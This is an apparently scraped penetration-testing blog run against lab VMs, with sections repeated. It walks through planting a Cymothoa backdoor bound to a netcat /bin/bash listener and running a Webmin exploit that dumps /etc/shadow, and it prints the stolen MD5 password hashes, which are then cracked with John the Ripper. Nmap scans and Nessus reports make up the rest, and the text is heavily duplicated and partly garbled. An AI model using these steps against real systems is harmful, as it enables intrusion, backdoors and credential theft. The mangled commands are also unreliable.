1. Type on console backtrack
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 1000 -e > cy /bin/bash
listening on [any] 1000 ...
2. on Ubuntu type
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 1000 -e > cy /bin/bash
listening on [any] 1000 ...
3. at on console ubuntu type
./cymonthoa
4. cek proses status type
ps aux
5. and last type
./cymontoa -p 5586 -s O -y 1000
-
Slack space is a form of internal fragmentation, i.e. wasted space, on a hard disk. When a file is written to disk it’s stored at the “begin...
-
Hey guys,, In the night, i will be writting tutorial about Attack Vektor on BeEF+Metasploit. Yesterday, i was written first about BeEF and ...
-
1. first you have to search or scan host that will be targeted 2. Start the the nessus, make sure the service has gone the way of open th...
1/30/12
Privilege Escalation (Cracking Password Using John the Ripper)
Continuing post Privilege Escalation Part 1
1.Copy this file and save as at root or home for example give it a name etcshadow (This is the contents of the file etc / shadow, which had been taken from the server)
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
2. Open terminal type
root@bt:cd /pentest/passwords/john
3. Crack Password and type
root@bt:/pentest/passwords/john# ./john /etcshadow
1.Copy this file and save as at root or home for example give it a name etcshadow (This is the contents of the file etc / shadow, which had been taken from the server)
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
2. Open terminal type
root@bt:cd /pentest/passwords/john
3. Crack Password and type
root@bt:/pentest/passwords/john# ./john /etcshadow
Privilege Escalation (How to get file etc/shadow on the server)
1. Information Gathering with nmap
root@bt:~# nmap -T4 -A -v 192.168.0.112 -O
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 22:50 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 22:50
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 22:50, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:50
Completed Parallel DNS resolution of 1 host. at 22:50, 13.00s elapsed
Initiating SYN Stealth Scan at 22:50
Scanning 192.168.0.112 [1000 ports]
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 445/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112
Completed SYN Stealth Scan at 22:50, 0.12s elapsed (1000 total ports)
Initiating Service scan at 22:50
Scanning 5 services on 192.168.0.112
Completed Service scan at 22:50, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 22:50
Completed NSE at 22:50, 1.08s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00054s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.089 days (since Mon Jan 30 20:42:49 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=210 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-01-31 05:50:43 UTC-6
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.0.112
NSE: Script Post-scanning.
Initiating NSE at 22:50
Completed NSE at 22:50, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1532 (67.454KB)
2. There mention of open ports and services running
3. Take a look on port 80 and 10000. There are service running Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) on port 80 and MiniServ 0.01 (Webmin httpd) on port 10000.
4. Try to check the browser
192.168.0.112:80
192.168.0.112:10000
5. Vulnerability Assesment with Nessus (sorry i can not include screenshots because there is a problem when taking pictures nessus)
Report of Nessus
6. Exploit using ExploitDB
Open terminal and type 7. search exploit (webmin) type on terminal
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
8. Choose /multiple/remote/2017.pl
9. Move into the home folder
root@bt:/pentest/exploits/exploitdb# cp /multiple/remote/2017.pl /home
# Run the exploit
root@bt:/home# perl 2017.pl 192.168.0.112 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.112 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
-------------------------------------
root@bt:~# nmap -T4 -A -v 192.168.0.112 -O
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 22:50 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 22:50
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 22:50, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:50
Completed Parallel DNS resolution of 1 host. at 22:50, 13.00s elapsed
Initiating SYN Stealth Scan at 22:50
Scanning 192.168.0.112 [1000 ports]
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 445/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112
Completed SYN Stealth Scan at 22:50, 0.12s elapsed (1000 total ports)
Initiating Service scan at 22:50
Scanning 5 services on 192.168.0.112
Completed Service scan at 22:50, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 22:50
Completed NSE at 22:50, 1.08s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00054s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.089 days (since Mon Jan 30 20:42:49 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=210 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-01-31 05:50:43 UTC-6
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.0.112
NSE: Script Post-scanning.
Initiating NSE at 22:50
Completed NSE at 22:50, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1532 (67.454KB)
2. There mention of open ports and services running
3. Take a look on port 80 and 10000. There are service running Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) on port 80 and MiniServ 0.01 (Webmin httpd) on port 10000.
4. Try to check the browser
192.168.0.112:80
192.168.0.112:10000
5. Vulnerability Assesment with Nessus (sorry i can not include screenshots because there is a problem when taking pictures nessus)
Report of Nessus
PORT WWW (10000/TCP)
Plugin ID: 22300
Webmin / Usermin Null Byte Filtering Vulnerabilities
Synopsis
The remote web server is affected by multiple issues.
List of Hosts
192.168.0.112
Description
The remote host is running Webmin or Usermin, web-based interfaces for
Unix / Linux system administrators and end-users. Webmin and Usermin both come with the Perl script 'miniserv.pl' to
provide basic web services, and the version of 'miniserv.pl' installed
on the remote host fails to properly filter null characters from URLs.
An attacker may be able to exploit this to reveal the source code of CGI
scripts, obtain directory listings, or launch cross-site scripting
attacks against the affected application.
Solution
Upgrade to Webmin version 1.296 / Usermin 1.226 or later.
See also
Risk Factor
Medium/ CVSS Base Score: 6.8
(CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVSS Temporal Score: 6.5(CVSS2#E:F/RL:U/RC:C)
Bugtraq ID
Vulnerability publication date: 2006/09/01
Plugin publication date: 2006/09/02
Plugin last modification date: 2011/03/14
Ease of exploitability : Exploits are available
PORT CIFS (445/TCP)
Plugin ID: 57608
SMB Signing Disabled
Synopsis
Signing is disabled on the remote SMB server.
List of Hosts
192.168.0.112
Description
Signing is disabled on the remote SMB server. This can allow
man-in-the-middle attacks against the SMB server.
Solution
Enforce message signing in the host's configuration. On Windows,
this is found in the Local Security Policy. On Samba, the setting is
called 'server signing'. See the 'see also' links for further
details.
See also
Risk Factor
Medium/ CVSS Base Score: 5.0
(CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)
Vulnerability publication date: 2012/01/17
Plugin publication date: 2012/01/19
Plugin last modification date: 2012/01/19
PORT WWW (80/TCP)
Plugin ID: 24260
HyperText Transfer Protocol (HTTP) Information
Synopsis
Some information about the remote HTTP configuration can be extracted.
List of Hosts
192.168.0.112
Plugin Output
6. Exploit using ExploitDB
Open terminal and type
root@bt:cd /pentest/exploits/exploitdb#
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
8. Choose /multiple/remote/2017.pl
9. Move into the home folder
root@bt:/pentest/exploits/exploitdb# cp /multiple/remote/2017.pl /home
# Run the exploit
root@bt:/home# perl 2017.pl 192.168.0.112 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.112 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
-------------------------------------
1/27/12
Own Windows XP 3 with Metasploit Framework Backtrack 5 (Virtual Box)
1. Make sure windows xp is installed on Virtual Box
2. Make sure it is connected between the host and guest (BT5 and XP)
3. Cek ip guest type on command ipconfig
4. Information Gathering with BT 5
5. Scan ip guest with zenmap
6. Fill ip guest on target 192.168.56.101 and choose intense scan
2. Make sure it is connected between the host and guest (BT5 and XP)
3. Cek ip guest type on command ipconfig
4. Information Gathering with BT 5
5. Scan ip guest with zenmap
6. Fill ip guest on target 192.168.56.101 and choose intense scan
Vulnerability Assessment with Nessus + Exploit
1. first you have to search or scan host that will be targeted
2. Start the the nessus, make sure the service has gone the way of open the terminal and type
root@bt:~# /etc/init.d/nessusd start
3. Open browser and type localhost:8834 and then login Nessus
4. If so, click scan and add then will appear the form
5. click launch scan wait until the process is complete. after completion and then click Report
6. select a name and click browse
7. then will appear all hostnames
8. as an example I will try to do vulnerability assessment for ip 192.168.0.67 (click host ip)
9. I will try to analyze on port 445 Samba MS-RPC request heap-based remote buffer overflow
Synopsis: It is possible to execute code on the remote host through Samba.
Description
The version of the Samba server installed on the remote host is
affected by multiple heap overflow vulnerabilities, which can be
exploited remotely to execute code with the privileges of the Samba
daemon.
Solution
Upgrade to Samba version 3.0.25 or later.
See Also
http://www.samba.org/samba/security/CVE-2007-2446.html
Risk Factor: Critical
CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE
CVE-2007-2446
BID
23973
24195
24196
24197
24198
Xref
OSVDB:34699
OSVDB:34731
OSVDB:34732
OSVDB:34733
Vulnerability Publication Date: 2007/05/14
Patch Publication Date: 2007/07/11
Plugin Publication Date: 2007/05/15
Plugin Last Modification Date: 2011/04/13
Public Exploit Available: True
Exploitable With: Canvas (CANVAS), Metasploit (Samba lsa_io_trans_names Heap Overflow)
10. above is the description that appears. On the information at the bottom there are solutions Exploitable With : Canvas (CANVAS), Metasploit (Samba lsa_io_trans_names Heap Overflow). But I will try to use the exploit.
11. Oke,now go to apps> exploitations tools> opensorce Exploitation> exploit-db> db exploit search
13. Search exploit and type
root@bt:/pentest/exploits/exploitdb# ./searchsploit canvas
select the appropriate platform
to extract the files
python file.py
perl file.pl
ruby file.rb
cat file.txt
gcc file.c -o newfilename
Update : There is problem on screenshots
Step 4
Name:it's up to you
Type: Run Now
Policy: Internal Network
Scan Target: 192.168.0.0/24
Step 6
Name which you have made on form
Result Nessus
2. Start the the nessus, make sure the service has gone the way of open the terminal and type
root@bt:~# /etc/init.d/nessusd start
3. Open browser and type localhost:8834 and then login Nessus
4. If so, click scan and add then will appear the form
5. click launch scan wait until the process is complete. after completion and then click Report
6. select a name and click browse
7. then will appear all hostnames
8. as an example I will try to do vulnerability assessment for ip 192.168.0.67 (click host ip)
9. I will try to analyze on port 445 Samba MS-RPC request heap-based remote buffer overflow
Synopsis: It is possible to execute code on the remote host through Samba.
Description
The version of the Samba server installed on the remote host is
affected by multiple heap overflow vulnerabilities, which can be
exploited remotely to execute code with the privileges of the Samba
daemon.
Solution
Upgrade to Samba version 3.0.25 or later.
See Also
http://www.samba.org/samba/security/CVE-2007-2446.html
Risk Factor: Critical
CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE
CVE-2007-2446
BID
23973
24195
24196
24197
24198
Xref
OSVDB:34699
OSVDB:34731
OSVDB:34732
OSVDB:34733
Vulnerability Publication Date: 2007/05/14
Patch Publication Date: 2007/07/11
Plugin Publication Date: 2007/05/15
Plugin Last Modification Date: 2011/04/13
Public Exploit Available: True
Exploitable With: Canvas (CANVAS), Metasploit (Samba lsa_io_trans_names Heap Overflow)
10. above is the description that appears. On the information at the bottom there are solutions Exploitable With : Canvas (CANVAS), Metasploit (Samba lsa_io_trans_names Heap Overflow). But I will try to use the exploit.
11. Oke,now go to apps> exploitations tools> opensorce Exploitation> exploit-db> db exploit search
13. Search exploit and type
root@bt:/pentest/exploits/exploitdb# ./searchsploit canvas
select the appropriate platform
to extract the files
python file.py
perl file.pl
ruby file.rb
cat file.txt
gcc file.c -o newfilename
Update : There is problem on screenshots
Step 4
Name:it's up to you
Type: Run Now
Policy: Internal Network
Scan Target: 192.168.0.0/24
Step 6
Name which you have made on form
Result Nessus
t is possible to obtain information about the remote operating\system.
List of Hosts
192.168.0.67
Plugin Output
The remote Operating System is : Unix
The remote native lan manager is : Samba 3.0.20-Debian
The remote SMB Domain Name is : METASPLOITABLE
Description
It is possible to get the remote operating system name and
version (Windows and/or Samba) by sending an authentication
request to port 139 or 445.
Solution
n/a
Risk Factor
None
Plugin publication date: 2001/10/17
Plugin last modification date: 2011/03/17
PORT CIFS (445/TCP)
Plugin ID: 17651
Microsoft Windows SMB : Obtains the Password Policy
Synopsis
It is possible to retrieve the remote host's password policy using the\supplied credentials.
List of Hosts
192.168.0.67
Plugin Output
The following password policy is defined on the remote host:
Minimum password len: 5
Password history len: 0
Maximum password age (d): No limit
Password must meet complexity requirements: Disabled
Minimum password age (d): 0
Forced logoff time (s): Not set
Locked account time (s): 1800
Time between failed logon (s): 1800
Number of invalid logon before locked out (s): 0
Description
Using the supplied credentials it was possible to extract the
password policy for the remote Windows host. The password policy must
conform to the Informational System Policy.
Solution
n/a
Risk Factor
None
Plugin publication date: 2005/03/30
Plugin last modification date: 2011/03/04
PORT WWW (80/TCP)
Plugin ID: 39521
Backported Security Patch Detection (WWW)
Synopsis
Security patches are backported.
List of Hosts
192.168.0.67
Plugin Output
Give Nessus credentials to perform local checks.
Description
Security patches may have been 'back ported' to the remote HTTP server
without changing its version number.
Banner-based checks have been disabled to avoid false positives.
Note that this test is informational only and does not denote any
security problem.
Solution
N/A
See also
Risk Factor
None
Plugin publication date: 2009/06/25
Plugin last modification date: 2011/03/18
PORT SSH (22/TCP)
Plugin ID: 32314
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness
Synopsis
The remote SSH host keys are weak.
List of Hosts
192.168.0.67
Description
The remote SSH host key has been generated on a Debian
or Ubuntu system which contains a bug in the random number
generator of its OpenSSL library.
The problem is due to a Debian packager removing nearly all
sources of entropy in the remote version of OpenSSL.
An attacker can easily obtain the private part of the remote
key and use this to set up decipher the remote session or
set up a man in the middle attack.
Solution
Consider all cryptographic material generated on the remote host
to be guessable. In particuliar, all SSH, SSL and OpenVPN key
material should be re-generated.
See also
Risk Factor
Critical/ CVSS Base Score: 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score: 8.3(CVSS2#E:F/RL:OF/RC:C)
Bugtraq ID
Plugin publication date: 2008/05/14
Plugin last modification date: 2011/03/21
Ease of exploitability : Exploits are available
Exploitable with: Core Impact
PORT DNS (53/TCP)
Plugin ID: 11002
DNS Server Detection
Synopsis
A DNS server is listening on the remote host.
List of Hosts
192.168.0.67
Description
The remote service is a Domain Name System (DNS) server, which
provides a mapping between hostnames and IP addresses.
Solution
Disable this service if it is not needed or restrict access to
internal hosts only if the service is available externally.
See also
Risk Factor
None
Plugin publication date: 2003/02/13
Plugin last modification date: 2011/03/11
PORT CIFS (445/TCP)
Plugin ID: 57608
SMB Signing Disabled
Synopsis
Signing is disabled on the remote SMB server.
List of Hosts
192.168.0.67
Description
Signing is disabled on the remote SMB server. This can allow
man-in-the-middle attacks against the SMB server.
Solution
Enforce message signing in the host's configuration. On Windows,
this is found in the Local Security Policy. On Samba, the setting is
called 'server signing'. See the 'see also' links for further
details.
See also
Risk Factor
Medium/ CVSS Base Score: 5.0
(CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N)
Vulnerability publication date: 2012/01/17
Plugin publication date: 2012/01/19
Plugin last modification date: 2012/01/19
PORT WWW (80/TCP)
Plugin ID: 22964
Service Detection
Synopsis
The remote service could be identified.
List of Hosts
192.168.0.67
Plugin Output
A web server is running on this port.
Description
It was possible to identify the remote service by its banner or by looking
at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin publication date: 2007/08/19
Plugin last modification date: 2012/01/19
PORT SSH (22/TCP)
Plugin ID: 22964
Service Detection
Synopsis
The remote service could be identified.
List of Hosts
192.168.0.67
Plugin Output
An SSH server is running on this port.
Description
It was possible to identify the remote service by its banner or by looking
at the error message it sends when it receives an HTTP request.
Solution
n/a
Risk Factor
None
Plugin publication date: 2007/08/19
Plugin last modification date: 2012/01/19
PORT POSTGRESQL (5432/TCP)
Plugin ID: 26024
PostgreSQL Server Detection
Synopsis
A database service is listening on the remote host.
List of Hosts
192.168.0.67
Description
The remote service is a PostgreSQL database server, or a derivative
such as EnterpriseDB.
Solution
Limit incoming traffic to this port if desired.
See also
Risk Factor
None
Plugin publication date: 2007/09/14
Plugin last modification date: 2011/03/11
PORT (0/TCP)
Plugin ID: 45590
Common Platform Enumeration (CPE)
Synopsis
It is possible to enumerate CPE names that matched on the remote\system.
List of Hosts
192.168.0.67
Plugin Output
The remote operating system matched the following CPE :
cpe:/o:canonical:ubuntu_linux:8.04
Following application CPE's matched on the remote system :
cpe:/a:openbsd:openssh:4.7
cpe:/a:samba:samba:3.0.20 -> Samba 3.0.20
cpe:/a:apache:http_server:2.2.8 -> Apache Software Foundation Apache HTTP Server 2.2.8
cpe:/a:php:php:5.2.4-2ubuntu5.10
cpe:/a:isc:bind:9.4.
Description
By using information obtained from a Nessus scan, this plugin reports
CPE (Common Platform Enumeration) matches for various hardware and
software products found on a host.
Note that if an official CPE is not available for the product, this
plugin computes the best possible CPE based on the information
available from the scan.
Solution
n/a
See also
Risk Factor
None
Plugin publication date: 2010/04/21
Plugin last modification date: 2012/01/19
PORT (0/TCP)
Plugin ID: 11936
OS Identification
Synopsis
It is possible to guess the remote operating system.
List of Hosts
192.168.0.67
Plugin Output
Remote operating system : Linux Kernel 2.6 on Ubuntu 8.04 (hardy)
Confidence Level : 95
Method : SSH
The remote host is running Linux Kernel 2.6 on Ubuntu 8.04 (hardy)
Description
Using a combination of remote probes, (TCP/IP, SMB, HTTP, NTP, SNMP, etc...)
it is possible to guess the name of the remote operating system in use, and
sometimes its version.
Solution
N/A
Risk Factor
None
Plugin publication date: 2003/12/09
Plugin last modification date: 2012/01/09
PORT (0/TCP)
Plugin ID: 18261
Apache Banner Linux Distribution Disclosure
Synopsis
The name of the Linux distribution running on the remote host was\found in the banner of the web server.
List of Hosts
192.168.0.67
Plugin Output
The linux distribution detected was :
- Ubuntu 8.04 (gutsy)
Description
This script extracts the banner of the Apache web server and attempts
to determine which Linux distribution the remote host is running.
Solution
If you do not wish to display this information, edit httpd.conf and
set the directive 'ServerTokens Prod' and restart Apache.
Risk Factor
None
Plugin publication date: 2005/05/15
Plugin last modification date: 2012/01/24
PORT CIFS (445/TCP)
Plugin ID: 10395
Microsoft Windows SMB Shares Enumeration
Synopsis
It is possible to enumerate remote network shares.
List of Hosts
192.168.0.67
Plugin Output
Here are the SMB shares available on the remote host when logged as a NULL session:
- print$
- tmp
- opt
- IPC$
- ADMIN$
Description
By connecting to the remote host, Nessus was able to enumerate
the network share names.
Solution
N/A
Risk Factor
None
Plugin publication date: 2000/05/09
Plugin last modification date: 2011/09/14
PORT SSH (22/TCP)
Plugin ID: 10881
SSH Protocol Versions Supported
Synopsis
A SSH server is running on the remote host.
List of Hosts
192.168.0.67
Plugin Output
The remote SSH daemon supports the following versions of the
SSH protocol :
- 1.99
- 2.0
SSHv2 host key fingerprint : 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3
Description
This plugin determines the versions of the SSH protocol supported by
the remote SSH daemon.
Solution
n/a
Risk Factor
None
Plugin publication date: 2002/03/06
Plugin last modification date: 2011/03/30
PORT NETBIOS-NS (137/UDP)
Plugin ID: 10150
Windows NetBIOS / SMB Remote Host Information Disclosure
Synopsis
It is possible to obtain the network name of the remote host.
List of Hosts
192.168.0.67
Plugin Output
The following 7 NetBIOS names have been gathered :
METASPLOITABLE = Computer name
